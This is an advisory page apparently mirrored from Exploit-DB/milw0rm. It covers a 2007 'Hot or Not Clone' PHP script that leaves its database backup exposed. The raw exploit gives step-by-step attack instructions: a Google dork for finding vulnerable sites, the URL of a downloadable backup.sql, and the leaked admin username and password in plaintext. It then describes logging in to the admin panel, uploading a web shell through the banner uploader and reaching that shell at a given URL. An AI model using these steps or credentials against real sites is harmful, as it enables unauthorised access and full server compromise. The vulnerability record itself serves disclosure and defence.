Hot or Not Clone by Jnshosts.com Dump backup And See Password Admin

vendor:

Hot or Not Clone

by:

RoMaNcYxHaCkEr

5.5

CVSS

MEDIUM

Information Disclosure

200

CWE

Product Name: Hot or Not Clone

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Hot or Not Clone by Jnshosts.com Dump backup And See Password Admin

The Hot or Not Clone script by Jnshosts.com allows unauthorized access to the admin password by downloading the backup file and viewing it. The password can be found in the backup.sql file. The admin credentials are 'admin' for the username and 'desperad' for the password. The vulnerability also allows for the uploading of a shell. The admin control panel can be accessed at http://www.ratemyscript.com/control/. The uploaded shell can be seen at http://www.ratemyscript.com/banners/tryag.php.

Mitigation:

The vendor should release a patch to fix the vulnerability and enforce strong passwords for admin accounts. Users should ensure they have the latest version of the script installed and change the default admin password.

Source

Exploit-DB raw data:

# Name : Hot or Not Clone by Jnshosts.com  Dump backup And See Password Admin
# Download From : http://www.jnshosts.com/downloads/hot-or-not-clone-script/index.php
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
# Google Dork : Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::
============================================================================
# Exploit:
You Can Download Backup For Script Like e.g Here:
http://www.ratemyscript.com/control/backup/backup.php
I Donlowad Backup.sql Then I See Password Here Like e.g In Line May Be 2 Or 3:
);#%%
INSERT INTO admin VALUES ('admin','desperad');
username admin : admin
password : desperad
Then Enter Here In Admincp:
http://www.ratemyscript.com/control/
If You Want Upload Shell You Can Enter Here :
http://www.ratemyscript.com/control/sitebanners/upload_banners.php
Then Enter Here If You See Uploaded Banner Like Here:
http://www.ratemyscript.com/control/sitebanners/manage_banners.php
Then Like Here See Direct Shell:
http://www.ratemyscript.com/banners/tryag.php
That,s Gift For Tryag TeaM ^^
Good Luck Everybody
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa TeaM (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
H-T TeaM (no-hack.fr)
Str0ck
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends
# For Contact : RxH@HotMail.iT
Happy Aid All Muslims
Best Wishes

# milw0rm.com [2007-12-28]